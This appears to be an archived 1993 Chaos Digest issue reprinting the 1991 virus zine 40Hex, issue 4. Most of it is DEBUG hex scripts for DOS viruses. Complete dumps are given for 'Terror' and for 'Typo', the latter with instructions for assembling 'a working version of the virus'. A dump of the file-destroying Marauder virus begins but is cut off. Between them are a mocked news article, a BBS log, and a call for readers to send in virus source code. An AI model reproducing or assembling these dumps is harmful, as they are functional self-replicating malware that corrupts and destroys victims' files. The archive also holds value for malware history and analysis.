home *** CD-ROM | disk | FTP | other *** search

---

/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / KAOS1_42.ZIP / KAOS1-42

Wrap

Text File  |  1993-06-02  |  29KB  |  637 lines

---

1. Chaos Digest               Lundi 31 Mai 1993        Volume 1 : Numero 42
2.                             ISSN  1244-4901
3.  
4.        Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
5.        Archiviste: Yves-Marie Crabbe
6.        Co-Redacteurs: Arnaud Bigare, Stephane Briere
7.  
8. TABLE DES MATIERES, #1.42 (31 Mai 1993)
9. File 1--40H VMag Issue 1 Volume 4 #004-008 (reprint)
10.  
11. Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
12. available at no cost by sending a message to:
13.                 linux-activists-request@niksula.hut.fi
14. with a mail header or first line containing the following informations:
15.                     X-Mn-Admin: join CHAOS_DIGEST
16.  
17. The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
18. or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
19. 155, 93404 St-Ouen Cedex, France.  He is a member of the EICAR and EFF (#1299)
20. groups.
21.  
22. Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
23. 466893.  Back issues of ChaosD can be found on the Internet as part of the
24. Computer underground Digest archives. They're accessible using anonymous FTP:
25.  
26.         * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
27.         * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
28.         * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
29.         * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
30.         * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
31.         * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
32.         * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
33.         * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos
34.  
35. CHAOS DIGEST is an open forum dedicated to sharing French information among
36. computerists and to the presentation and debate of diverse views. ChaosD
37. material may be reprinted for non-profit as long as the source is cited.
38. Some authors do copyright their material, and they should be contacted for
39. reprint permission.  Readers are encouraged to submit reasoned articles in
40. French, English or German languages relating to computer culture and
41. telecommunications.  Articles are preferred to short responses.  Please
42. avoid quoting previous posts unless absolutely necessary.
43.  
44. DISCLAIMER: The views represented herein do not necessarily represent
45.             the views of the moderators. Chaos Digest contributors
46.             assume all responsibility for ensuring that articles
47.             submitted do not violate copyright protections.
48.  
49. ----------------------------------------------------------------------
50.  
51. Date: Tue May 11 09:24:40 PDT 1993
52. From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
53. Subject: File 1--40H VMag Issue 1 Volume 4 #004-008 (reprint)
54.  
55.  
56. 40Hex Issue 4                                            December 1991
57.  
58.                                  Terror
59.                                  ++++++
60.  
61.    Duh, just as I was about to relase this issue I found that I forgot
62.    to make a artical 4.  So here it is.
63.  
64. ---------------------------------------------------------------------------
65. n terror.com
66. e 0100  50 8C C8 01 06 0B 01 58 EA 00 01 40 00 90 90 90
67. e 0110  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
68. e 0120  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
69. e 0130  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
70. e 0140  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
71. e 0150  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
72. e 0160  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
73. e 0170  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
74. e 0180  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
75. e 0190  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
76. e 01A0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
77. e 01B0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
78. e 01C0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
79. e 01D0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
80. e 01E0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
81. e 01F0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
82. e 0200  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
83. e 0210  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
84. e 0220  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
85. e 0230  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
86. e 0240  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
87. e 0250  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
88. e 0260  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
89. e 0270  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90. e 0280  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
91. e 0290  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
92. e 02A0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
93. e 02B0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
94. e 02C0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
95. e 02D0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
96. e 02E0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
97. e 02F0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
98. e 0300  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
99. e 0310  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
100. e 0320  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
101. e 0330  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
102. e 0340  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
103. e 0350  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
104. e 0360  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
105. e 0370  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
106. e 0380  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
107. e 0390  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
108. e 03A0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
109. e 03B0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
110. e 03C0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
111. e 03D0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
112. e 03E0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
113. e 03F0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
114. e 0400  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
115. e 0410  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
116. e 0420  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
117. e 0430  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
118. e 0440  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
119. e 0450  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
120. e 0460  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
121. e 0470  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
122. e 0480  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
123. e 0490  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
124. e 04A0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
125. e 04B0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
126. e 04C0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
127. e 04D0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
128. e 04E0  90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
129. e 04F0  90 90 90 90 90 90 90 90 90 90 90 B8 00 4C CD 21
130. e 0500  EB 44 E4 12 AB 09 8D 13 D0 17 60 14 7A 0F E9 F8
131. e 0510  03 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
132. e 0520  90 90 90 90 90 90 44 3A 5C 43 4F 4D 4D 41 4E 44
133. e 0530  2E 43 4F 4D 00 2E 81 3E 0E 01 5A 4D 74 07 2E 81
134. e 0540  3E 0E 01 4D 5A C3 2E 8C 1E 41 05 50 B8 59 EC CD
135. e 0550  21 3B E8 75 3E 0E 1F 58 2E 8E 06 41 05 E8 D5 FF
136. e 0560  74 10 B9 0D 00 BE 0E 01 06 BF 00 01 57 F3 A4 06
137. e 0570  1F CB 8C C6 83 C6 10 2E 01 36 24 01 2E 03 36 1C
138. e 0580  01 2E 8B 3E 1E 01 06 1F FA 8E D6 8B E7 FB 2E FF
139. e 0590  2E 22 01 B4 30 CD 21 BB 02 01 3D 03 0A 75 12 B8
140. e 05A0  70 00 BB 43 0D 8E C0 26 80 3F 2E 75 2A 8B C3 EB
141. e 05B0  2A 83 C3 04 3D 03 14 74 1E 83 C3 04 3D 03 1E 74
142. e 05C0  16 B8 13 35 CD 21 2E 89 1E 27 05 2E 8C 06 29 05
143. e 05D0  B8 21 35 8B D3 EB 16 2E 8B 47 02 2E 8B 17 2E A3
144. e 05E0  27 05 2E C7 06 29 05 70 00 B4 34 CD 21 06 1F B8
145. e 05F0  EC 25 CD 21 2E A1 41 05 8E C0 48 8E D8 8B 1E 03
146. e 0600  00 83 EB 65 03 C3 26 A3 02 00 B4 4A CD EC BB 64
147. e 0610  00 B4 48 CD EC 2D 10 00 8E C0 C6 06 00 00 5A 0E
148. e 0620  1F BE 00 01 8B FE B9 43 04 90 F3 A4 BF 32 02 06
149. e 0630  57 CB 26 C7 06 F1 00 70 00 B8 21 35 CD EC 2E 89
150. e 0640  1E 87 02 2E 8C 06 89 02 B4 25 BA 63 02 0E 1F CD
151. e 0650  EC 0E 07 BF 43 05 B9 19 00 B0 00 F3 AA E9 F7 FE
152. e 0660  8B E8 CF 3D 59 EC 74 F8 3D 00 4B 74 1E 80 FC 3D
153. e 0670  74 21 80 FC 3E 74 44 80 FC 11 75 0A 57 8B FA 80
154. e 0680  7D 06 08 74 77 5F EA 5C 06 1E 29 E8 91 00 EB F6
155. e 0690  59 EB F3 51 E8 27 02 72 F7 83 F9 20 59 75 E7 B0
156. e 06A0  02 9C 2E FF 1E 87 02 72 0F 50 53 8B D8 2E A0 5C
157. e 06B0  05 2E 88 87 43 05 5B 58 CA 02 00 2E 80 BF 43 05
158. e 06C0  00 74 C3 50 2E 8A 87 43 05 2E A2 5C 05 2E C6 87
159. e 06D0  43 05 00 B4 45 CD EC 2E A3 41 05 58 72 A8 9C 2E
160. e 06E0  FF 1E 87 02 72 D2 53 2E 8B 1E 41 05 1E E8 5F 00
161. e 06F0  E8 92 00 E8 A6 01 1F 5B F8 CA 02 00 50 52 1E 8A
162. e 0700  45 07 BA 26 01 0A C0 74 08 04 40 2E A2 26 01 EB
163. e 0710  03 83 C2 02 0E 1F E8 06 00 1F 5A 58 E9 66 FF 50
164. e 0720  53 51 E8 99 01 72 24 51 1E E8 23 00 1F B8 01 43
165. e 0730  33 C9 CD EC 72 07 B8 02 3D CD EC 8B D8 59 72 08
166. e 0740  E8 42 00 B8 01 43 CD EC E8 51 01 59 5B 58 C3 50
167. e 0750  52 53 06 B8 13 35 CD EC 2E 89 1E 22 05 2E 8C 06
168. e 0760  24 05 B0 24 CD EC 2E 89 1E 3D 05 2E 8C 06 3F 05
169. e 0770  07 5B 0E 1F BA 19 05 B4 25 CD EC BA 1C 05 B0 13
170. e 0780  CD EC 5A 58 C3 50 51 52 56 57 1E BF 0E 01 B9 FF
171. e 0790  FF BA FA FF B8 02 42 CD EC B4 3F B9 06 00 0E 1F
172. e 07A0  8B D7 CD EC 72 1B 2E 81 3D 54 65 74 14 33 C9 33
173. e 07B0  D2 B8 00 42 CD EC B4 3F B9 18 00 8B D7 CD EC 73
174. e 07C0  03 E9 C4 00 33 C9 33 D2 2E 80 3E 5C 05 02 75 0B
175. e 07D0  81 7D 01 00 40 77 EA 49 BA 83 FB B8 02 42 CD EC
176. e 07E0  A9 0F 00 74 0F 8B CA 8B D0 83 C2 10 80 E2 F0 B8
177. e 07F0  00 42 EB EA E8 3E FD 74 11 0B D2 75 C4 3D 00 04
178. e 0800  73 03 E9 83 00 3D 00 FA 77 7E B1 04 D3 E8 8B F0
179. e 0810  B1 0C D3 E2 03 F2 B4 40 BA 00 01 B9 3D 04 90 CD
180. e 0820  EC 72 65 E8 0F FD 75 3C 83 EE 10 2E 2B 75 08 2E
181. e 0830  C7 45 14 00 01 2E 89 75 16 2E C7 45 10 00 04 83
182. e 0840  C6 44 90 2E 89 75 0E B8 02 42 33 C9 33 D2 CD EC
183. e 0850  B9 00 02 F7 F1 0B D2 74 01 40 2E 89 55 02 2E 89
184. e 0860  45 04 EB 12 56 57 06 0E 07 BE 2B 05 B9 0B 00 F3
185. e 0870  A4 07 5F 8F 45 0B B8 00 42 33 C9 33 D2 CD EC B4
186. e 0880  40 B9 18 00 8B D7 CD EC B8 00 57 CD EC B0 01 CD
187. e 0890  EC B4 3E CD EC 1F 5F 5E 5A 59 58 C3 50 52 1E B8
188. e 08A0  13 25 2E 8B 16 22 05 2E 8E 1E 24 05 CD EC B0 24
189. e 08B0  2E 8B 16 3D 05 2E 8E 1E 3F 05 1F 5A 58 C3 50 06
190. e 08C0  57 53 8B FA 1E 07 B0 00 B9 40 00 F2 AE 8B 45 FD
191. e 08D0  8B 4D FB 25 5F 5F 80 E5 5F 3D 4F 4D 75 09 81 F9
192. e 08E0  2E 43 74 0E F9 EB 2D 3D 58 45 75 F8 81 F9 2E 45
193. e 08F0  75 F2 B9 07 00 BB FF FF 43 8A 41 F4 24 5F 2E 3A
194. e 0900  87 29 01 E1 F3 B0 01 75 02 B0 02 2E A2 5C 05 B8
195. e 0910  00 43 CD EC 5B 5F 07 58 C3 B0 03 CF 80 FC 03 74
196. e 0920  05 EA C8 0E 1E 29 EA 7A 0F 70 00 50 8C C8 01 06
197. e 0930  0B 01 58 EA 00 01 20 54 65 72 72 6F 72 1A 1A 1A
198. rcx
199. 083d
200. w
201. q
202.  
203. +++++
204.  
205. 40Hex Issue 4                                            December 1991
206.  
207. "No feelings of what I left behind, no guilt for the victims of my crime.  No
208. compassion, just a burning deep inside.  No pain... I'm here just to die... "
209. - Sub Zero
210.  
211.  
212. This artical is from the 11/26/91 morning final of the San Jose Mercury News
213.  
214. **text written like this is my comments**
215.  
216.                  SURVEY DEFLATES COMPUTER-VIRUS DANGERS
217.  
218. But safeguards are few as cases proliferate.
219.  
220.    Computer viruses, those nasty bits of distructive programming unleashed
221. by deviant hackers, are multiplying at a startling rate - but haven't proved
222. nearly as troublesome as once feared and aren't scaring users enough to take
223. even simple safeguards.
224.  
225.    Dataquest Inc. a marker research firm in San Jose released a ground-
226. breaking 150-page survey Monday showing that almost two-thirds of business
227. and government organizatons with more than 300 personal computers has
228. encountered a viurs at least once this year.  Yet only 15 percent of them
229. has installed anti-virus software.
230.  
231.    What's more, Dataquest found the virus encounters more than doubled
232. in each of the first three quarters of 1991. **<smile, smile>**
233.  
234.    The National Computer Security Association of Washington D.C., which
235. represents 1,000 developers of anti-virus software, hired Dataquest to
236. conduct what is apparently the first study of virus proliferation by a
237. reseacher not directly employed by an anti-virus software company.
238.  
239.    Computer viruses hide themselves in legitamate files, jumping from
240. machine to machine.  Triggered either at random or on a set date, such
241. as Friday the 13th, the most destructive viruses gobble up programs and
242. data in their host computers. **gobble???**
243.  
244.    Robert Morris, then a student at Cornell University, unleashed a
245. the biggest virus to date in November 1988 **please** when a program he
246. intended to queitly slip onto a network call Internet went out of
247. control and temporally shut down 6,000 computers at universitys and
248. government reaserch labrotorys nationwide.  In the wake of the Internet
249. case, there were dire predictions of future virus attacks the could
250. bring the entire economy grinding to a halt.
251.  
252.    But there haven't been any major virus outbreaks since then and, it
253. turnded out, the Internet virus **Internet worm, damn it!!!** did little
254. permanent damage.
255.  
256.    What's more, most viruses are relitavely mild - more like a case of
257. sniffles the double pnemonia.  Typically, these mild viruses take up
258. space in the computers memory and slow down operations, but don't
259. destroy data. ** :) :( **
260.  
261.    "Many viruses are very innocuous," said Shella Cotter, director of
262. software consulting for Dataquest. "You find them, you identify them and
263. you get rid of them."
264.  
265.    "Many of the viruses I've heard about have not been big problems,"
266. added Jay BloomBecker ** tell me he aint gay **, director of the
267. National Center for Computer Crime Data in Santa Cruz.  "But it's
268. significant enough that if you're not paying attention to it, you
269. security is probably inadeqaute."
270.  
271.    Anti-virus software sold over the counter automatcally plucks out
272. the most of the roughly, 1,000 viruses identifey thoughout the world.
273. Occasoinally however, killer viruses can take over an entire computer
274. system and threaten a buisness with massive losses of crucial information.
275.  
276.    Dataquest talked to 600 orginazations during October and dicovered
277. that 63 percent had encountered at least one virussince the beginning of
278. the year.  Of these reporting and encounter, 62 percent claimed "a
279. definite loss of productivity," although the $70,000 study did not
280. tabulate the total cost.
281.  
282.    In the survey group, 9 percent reported a "virus disaster," defined
283. as a single incedent affecting 25 or more personal computers or
284. diskettes.  On average, computers involved in a virus disaster were out
285. of commision four days and required reprogramming at a cost of $6,200.
286.  
287.    And, in 3 percent of virus attacks, either the person who introduced
288. the virus or the person responible for computer security was threatened
289. with dismmisal.  Dataquest didn't count how many were actually fired.
290.  
291.    "Computer viruses are much more prevalent than people think and,
292. unless we think, and unless we take precautions, over time they are
293. going to get worse," said Andrew Seybold, head of the Dataquest servey team.
294.  
295.    But anti-virus software and strict enforcement of computer scurity
296. policies could change in the future.
297.  
298.    "The good news is, it's solveable.  The bad news is companies aren't
299. chossing to solve it,", Cotter concluded.  ** The other way around for us **
300.  
301. +++++
302.  
303. 40Hex Issue 4                                            December 1991
304.  
305.                          The Typo COM Virus
306.  
307.      The Typo Virus comes in 2 forms - a boot sector infector, and a
308. COM file infector.  This version is the COM version.  The effective
309. length of the virus is 867 bytes, and it only infects COM files.  Typo
310. stays resident, and can infect files whether they are run or not, from my
311. experience.  Typo isn't a destructive virus, but it does garble any
312. output to the parallel ports, by exchanging certain letters with others
313. that sound similar, and by transposing numbers.  Sometimes it replaces
314. one number with an entirely different number.  Typo is believed to have
315. originated in Israel, because some Hebrew letters are changed when it is
316. active, and it was isolated in that country.  Typo is easily detected by
317. SCAN, and the scan string is "A1 58 00 2E 89 84 99 FE 26 A1 5A 00" in lines
318. 400 and 410 of the hex dump, below.
319.  
320. To assemble TYPO.COM, cut out the following hex, and name the resulting
321. file TYPO.  Then, issue the command DEBUG < TYPO and you will have a
322. working version of the virus.
323.  
324. --DecimatoR
325.  
326. ----------------------------Cut Here------------------------------
327. n typo.com
328. e 0100  E9 18 00 31 E9 FF FF 2A 2E 43 4F 4D 00 CD 20 20
329. e 0110  56 31 05 00 CE CD 20 00 59 00 00 53 51 52 1E 06
330. e 0120  56 0E 1F E8 00 00 5E 83 EE 24 FF 4C 16 83 7C 16
331. e 0130  03 75 05 C7 44 16 5B 00 E8 85 02 BA D0 00 B4 1A
332. e 0140  CD 21 8A 44 0B 88 44 12 8B 44 0C 89 44 13 B4 2A
333. e 0150  CD 21 F6 C2 01 75 1F 8B D6 81 C2 05 00 33 C9 B4
334. e 0160  4E CD 21 72 11 E8 2C 00 8B D6 81 C2 05 00 33 C9
335. e 0170  B4 4F CD 21 73 EF 8A 44 12 A2 00 01 8B 44 13 A3
336. e 0180  01 01 BA 80 00 B4 1A CD 21 5E 07 1F 5A 59 5B B8
337. e 0190  00 01 FF E0 B8 01 43 BA EE 00 33 C9 CD 21 B8 02
338. e 01A0  3D BA EE 00 CD 21 73 03 E9 B4 00 89 44 10 8B D8
339. e 01B0  B4 3F B9 03 00 8B D6 81 C2 0B 00 CD 21 80 7C 0B
340. e 01C0  E9 75 30 8B 54 0C 83 EA 16 33 C9 B8 00 42 8B 5C
341. e 01D0  10 CD 21 8B D8 B4 3F B9 02 00 8B D6 81 C2 0E 00
342. e 01E0  8B 5C 10 CD 21 72 65 3D 00 00 74 07 8B 44 0E 3B
343. e 01F0  04 74 59 33 C9 33 D2 B8 02 42 8B 5C 10 CD 21 72
344. e 0200  4B 2D 03 00 89 44 03 8B 5C 10 B4 40 B9 63 03 90
345. e 0210  8B D6 81 C2 00 00 CD 21 72 32 83 44 03 19 33 D2
346. e 0220  33 C9 B8 00 42 8B 5C 10 CD 21 72 20 8B 5C 10 B4
347. e 0230  40 B9 03 00 8B D6 81 C2 02 00 CD 21 B8 01 57 8B
348. e 0240  5C 10 8B 0E E6 00 8B 16 E8 00 CD 21 8B 5C 10 B4
349. e 0250  3E CD 21 B8 01 43 BA EE 00 8A 0E E5 00 CD 21 C3
350. e 0260  FB 80 FC DD 75 03 8A C4 CF 80 FC 00 74 6C EA 2E
351. e 0270  E8 00 F0 C7 84 C7 84 59 00 60 31 32 33 34 35 36
352. e 0280  37 38 39 30 2D 3D 5C 7E 21 40 23 24 25 5E 26 2A
353. e 0290  28 29 5F 2B 7C 71 77 65 72 74 79 75 69 6F 70 5B
354. e 02A0  5D 5B 61 73 64 66 67 68 6A 6B 6C 3B 27 7A 78 63
355. e 02B0  76 62 6E 6D 2C 2E 2F 51 57 45 52 54 59 55 49 4F
356. e 02C0  50 7B 7D 41 53 44 46 47 48 4A 4B 4C 3A 22 3B 5A
357. e 02D0  58 43 56 42 4E 4D 3C 3E 3F 2E 56 E8 00 00 5E 9C
358. e 02E0  2E FF 5C 91 53 06 BB 40 00 8E C3 26 8B 1E 6C 00
359. e 02F0  53 2E 2B 5C 95 83 FB 02 5B 2E 89 5C 95 7F 39 2E
360. e 0300  87 5C 97 2E 2B 5C 97 F7 DB 2E 3B 5C 99 7C 29 2E
361. e 0310  FF 4C 99 2E 83 7C 99 06 74 06 2E C7 44 99 5B 00
362. e 0320  83 EE 65 51 B9 61 00 2E 3A 04 74 07 46 E2 F8 59
363. e 0330  EB 06 90 59 2E 8A 44 01 07 5B 5E CA 02 00 80 FC
364. e 0340  00 74 05 80 FC 4C 75 19 E8 24 00 2E 8B 16 2C 00
365. e 0350  8E C2 BB 00 00 B4 4A CD 21 BA 1D 00 83 C2 01 B4
366. e 0360  31 EA 60 14 73 02 B8 00 4C EB D3 3F 14 73 02 51
367. e 0370  57 56 06 E8 00 00 5E 56 BF 00 01 B9 DE 00 2E 8A
368. e 0380  84 EA FE 2E 88 05 46 47 E2 F4 5E 33 C9 8E C1 2E
369. e 0390  8B 4C EC 26 89 0E 84 00 2E 8B 4C EE 26 89 0E 86
370. e 03A0  00 2E 8B 4C F5 26 89 0E 80 00 2E 8B 4C F7 26 89
371. e 03B0  0E 82 00 B9 00 01 26 89 0E 58 00 07 5E 5F 59 C3
372. e 03C0  50 32 C0 B4 DD CD 16 3A C4 75 02 58 C3 53 56 06
373. e 03D0  8B 54 16 E8 00 00 5E 53 06 BB 40 00 8E C3 26 8B
374. e 03E0  1E 6C 00 2E 89 9C 9D FE 2E 89 9C 9F FE 07 5B 89
375. e 03F0  94 A1 FE 33 C0 8E C0 26 A1 84 00 2E 89 44 8C 26
376. e 0400  A1 86 00 2E 89 44 8E 26 A1 58 00 2E 89 84 99 FE
377. e 0410  26 A1 5A 00 2E 89 84 9B FE 26 A1 80 00 2E 89 44
378. e 0420  95 26 A1 82 00 2E 89 44 97 FA 0E 26 8F 06 86 00
379. e 0430  26 89 36 84 00 26 81 2E 84 00 98 00 0E 26 8F 06
380. e 0440  82 00 26 89 36 80 00 26 83 2E 80 00 70 0E 26 8F
381. e 0450  06 5A 00 26 89 36 58 00 26 81 2E 58 00 76 01 FB
382. e 0460  07 5E 5B 58 C3 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
383. rcx
384. 464
385. w
386. q
387. --------------------------Cut Here Too-----------------------------
388.  
389. Notice to all: 40Hex is always looking for new viruses to do write ups
390. on, and new source code to distribute.  If you have a copy of a rare
391. virus, and/or viral source code, please send it to Digital Warfare BBS,
392. at 717-367-3501.  We'll be happy to give you the credit for donating it -
393. IF you want us to.  ;)
394.  
395. --Dec
396.  
397. +++++
398.  
399. 40Hex Issue 4                                            December 1991
400.  
401.  
402.                        How Lame Are These People?
403.                        ++++++++++++++++++++++++++
404.  
405. This text is from the Homebase BBS, Mcaffee's board, all I can say is
406. read it.  Special apperance from Data Distruptor of Rabid and
407. Lestat/Skism, AKA me... Read on...
408.  
409.  
410. Msg#: 5712 *viru*
411. 11-19-91 17:11:34
412. From: TERRY ROSS
413.   To: ALL
414. Subj: IS THIS A VIRUS?
415. Hi.  Is there a known virus which displays a screen which reads "INC, for
416. quality cracks?"  I have recently inherited a computer at the company I work
417. at and there was apparently some tetris and blockout games on the disk which
418. are the source of this message.  I found a file called "runme.bat" with the
419. text in it, but even after I deleted it, it still pops up the aforementioned
420. message.  Also, the message gives me a choice of EGA CGA or monochrome and in
421. general, the message makes life difficult for me.
422.         any help with this would be vastly appreciated.
423.  
424. <*>Replies
425. <A>gain, <R>eply, <N>ext, or <S>top?
426.  
427.  
428. Msg has replies, read now(Y/N)? y
429.  
430.  
431. Msg#: 5715 *viru*
432. 11-19-91 17:50:59
433. From: ARYEH GORETSKY
434.   To: TERRY ROSS
435. Subj: REPLY TO MSG# 5712 (IS THIS A VIRUS?)
436. If you can upload a copy of an infected file, we can see if it contains viral
437. code.
438.  
439. Aryeh Goretsky
440.  Tech Support
441.  
442. <->, <A>gain, <R>eply, <N>ext, or <S>top? N
443.  
444. -- The below text was deleted by Aryeh, I don't think he likes me --
445.  
446. Msg#: 5718 *viru*
447. 11-19-91 19:42:34
448. From: LESTAT /SKISM
449.   To: TERRY ROSS
450. Subj: REPLY TO MSG# 5712 (IS THIS A VIRUS?)
451. It's not a virus.  INC is the International Network of Crackers.  What they do
452. is unprotect games and distribute them.  What you do have is most likely
453. illegally obtained software.
454.  
455. <->, <D>elete, <A>gain, <R>eply, <N>ext, or <S>top?
456.  
457.  
458. End of Replies, add yours(Y/N)? N
459.  
460.  
461. Msg#: 5717 *viru*
462. 11-19-91 18:01:25
463. From: DATA DISRUPTOR
464.   To: ARYEH GORETSKY
465. Subj: REPLY TO MSG# 5597 (RABID)
466.  Haha! Funny guy. I believe you are referring to the Roland D-10 and S-10
467. series of keyboards... R-10 being a keyboard... bah!
468.  
469. Data Disruptor RABID Int'nl Development Corp.
470.  
471. <*>Replies
472. <->, <A>gain, <R>eply, <N>ext, or <S>top?
473.  
474.  
475. Msg has replies, read now(Y/N)? y
476.  
477.  
478. -- Again I was deleted, come on Aryeh old buddy --
479.  
480. Msg#: 5719 *viru*
481. 11-19-91 19:45:03
482. From: LESTAT /SKISM
483.   To: DATA DISRUPTOR
484. Subj: REPLY TO MSG# 5717 (RABID)
485. Thats coming from a guy who thinks INC are virus writers.  Jessh.
486.  
487. <->, <D>elete, <A>gain, <R>eply, <N>ext, or <S>top?
488.  
489.  
490. End of Replies, add yours(Y/N)? N
491.  
492. +++++
493.  
494. 40Hex Issue 4                                            December 1991
495.  
496. "I take my boys everywhere I go, cause I'm paranoid..."
497.  
498.                            The Marauder Virus
499.                            ++++++++++++++++++
500.  
501.  
502.     December marks the first year of the group Skism.  The alliance of
503.     Phalcon/Skism took place around July 1991.  Me and a few freinds at
504.     school started the group by hacking old viruses into new strains.
505.     Well I have lost contact with these people since then and a new
506.     breed of members has risen from the ashes.
507.  
508.     Well, I myself have learned a lot over the year.  I went from virus
509.     hacker with about three viruses to my name, to overwritting man,
510.     to what I am now.  An advanced (kind of) level assembler programmer,
511.     writing parasitic infectors.  Well come this time next year I belive
512.     I'll be into more major stuff, ya know sick mother fucking DIR-2
513.     type action.  I've written a couple of TSR viruses shells, nothing
514.     completed yet.  Well anyway here's my personal latest creation -
515.     Marauder.  What Marauder is, is this ----
516.  
517. Marauder Virus
518. By Hellraiser
519. of Phalcon/Skism
520.  
521. Aliases: Deadpool-B, 808-B, 860.
522.  
523. Marauder is a non-overwriting, non-resident, encrypting, semi-mutating,
524. .COM file infector.
525.  
526. When a file is infected with the Marauder Virus the virus will search
527. the current path for a .COM file and infect it, adding 860 bytes to the
528. files size.  If not .COM files reside in the current directory, the
529. virus will go up one directory and check for .COM files to infect untill
530. it reaches the root.  At the root directory the virus will scan for
531. other directorys to find .COM files, until one uninfected .COM file is
532. found.  If no .COM files are found on the disk the virus will terminate
533. it search and return to the currently running program.
534.  
535. If an infected file is run on Feburary second of any year, the virus
536. will destroys all files in the current directory, by overwritting them
537. with message code.  The files will not run when executed, just terminate
538. upon reading the first line.  There is no way to recover the files once
539. the virus destroys them.  After this control will be given back to the
540. host program.
541.  
542. The Maruder virus is able to infect any .COM file no matter what
543. attribute... Hidden, System, Read-Only, etc... The files date, time, and
544. attribute will not be changed after a file becomes infected.
545.  
546. The virus will not cause a system error if run on a write-protected
547. floppy or fixed-disk, merely terminate any attempt of infection.
548.  
549. The virus will not infect files under 16 bytes or over 64,675 bytes.
550.  
551. For the most part the virus is randomly encrypted with each passing
552. infection, the small part of the program code which is not encrypted
553. mutates between two different, but comaptable strain of bytes.
554.  
555. There is not way of detecting the virus infections other than the
556. addition of 860 bytes to infected files, in other words, system-run time
557. is not affected at all.  If any run-time is affected it is the split
558. second it takes for the virus to infect a file.
559.  
560. The virus causes no damage to disk sectors or boot records etc... The
561. only perminate damage is the destuction of all files in the current
562. directory on 02/02/XX.
563.  
564. And here it is...
565.  
566. -------------------------------------------------------------------------
567. n target.com
568. e 0100  E9 61 00 88 68 69 73 20 66 69 6C 65 20 69 73 20
569. e 0110  69 6E 66 65 63 74 65 64 20 77 69 74 68 20 74 68
